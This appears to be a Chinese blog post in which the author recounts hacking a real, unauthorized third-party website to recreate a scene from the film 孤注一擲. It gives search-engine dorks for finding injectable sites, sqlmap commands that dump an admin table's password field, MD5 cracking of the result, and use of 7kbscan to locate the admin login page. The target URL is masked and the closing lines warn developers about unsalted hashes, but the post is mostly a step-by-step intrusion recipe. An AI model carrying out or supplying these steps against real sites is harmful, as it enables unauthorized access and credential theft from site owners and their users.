我模仿電影中的情節(jié),成功黑進(jìn)別人的網(wǎng)站
2024-05-06 加入收藏
大家好,我是小K,前段時(shí)間我盤點(diǎn)了電影《孤注一擲》中用到的技術(shù)棧:
傳送門:>>> 盤點(diǎn)電影《孤注一擲》中的技術(shù)棧 <<<
很多小伙伴表示對(duì)當(dāng)中男主潘生使用sqlmap
黑掉酒店會(huì)議中的PPT后臺(tái)的技術(shù)很感興趣。
今天我?guī)Т蠹冶M可能還原下當(dāng)時(shí)潘生的操作。
為了不給別人網(wǎng)站造成影響,我在文章中會(huì)碼掉一些敏感鏈接。
前期準(zhǔn)備
一臺(tái)正常使用的電腦; Python3環(huán)境; git環(huán)境
安裝sqlmap工具
使用git命令安裝
git clone https://github.com/sqlmapproject/sqlmap.git

選取目標(biāo)站點(diǎn)
當(dāng)前能被注入的網(wǎng)站基本上都是使用了比較“老”的技術(shù),新技術(shù)實(shí)現(xiàn)的站點(diǎn)基本都有防止sql注入的安全措施。
我們可以使用百度等搜索引擎搜尋一些可能“符合目標(biāo)”的站點(diǎn):
inurl:?id=1
inurl:asp?id=1
inurl:php?id=1
初篩目標(biāo)站點(diǎn)
我選取的目標(biāo)站點(diǎn):
我更改url中id后面的參數(shù)進(jìn)瀏覽器,回車之后瀏覽器還能正常顯示該網(wǎng)頁(yè),可能存在SQL注入漏洞。
利用漏洞
python sqlmap.py -u xxx.xxx/index.asp?id=3306-2 --tables
輸入Y
后回車,sqlmap
將會(huì)自動(dòng)嘗試進(jìn)行sql注入去搜索該站點(diǎn)在使用的關(guān)系型數(shù)據(jù)庫(kù)中的表。
假如能檢索到類似user
,admin
之類的表就注意了,管理員信息很有可能在里面!
可以使用以下命令去拿該表的字段名:
sqlmap -u xxx.xxx/index.asp?id=3306-2 -T admin --columns

再拿對(duì)應(yīng)字段名對(duì)應(yīng)的數(shù)據(jù):
sqlmap -u xxx.xxx/index.asp?id=3306-2 -T admin -C password --dump

然后就可以拿到密碼了。
這個(gè)站點(diǎn)的密碼字段經(jīng)過(guò)Hash,根據(jù)其長(zhǎng)度我猜測(cè)是進(jìn)行了md5哈希。便去嘗試使用md5解解看。
這里我不知道password這個(gè)值是否是進(jìn)行有被進(jìn)行加鹽,試了再說(shuō)。
搜尋管理員登入站點(diǎn)
在此我使用的是7kbscan
工具。輸入url和對(duì)應(yīng)的字典后,進(jìn)行測(cè)試:成功拿到管理登錄的入口頁(yè)面。
輸入拿到上文中拿到賬號(hào)密碼后:
后面內(nèi)容進(jìn)行留白處理...
最后
SQL注入攻擊是一招比較老式的黑客攻擊方式,現(xiàn)在可能對(duì)大部分站點(diǎn)都沒(méi)用了。
但是從安全方面給網(wǎng)站開(kāi)發(fā)人員敲響了警鐘,但凡上面有一步流程走不通(例如對(duì)密碼進(jìn)行加鹽后哈希),我們都將無(wú)法登入到管理員的站點(diǎn)中去。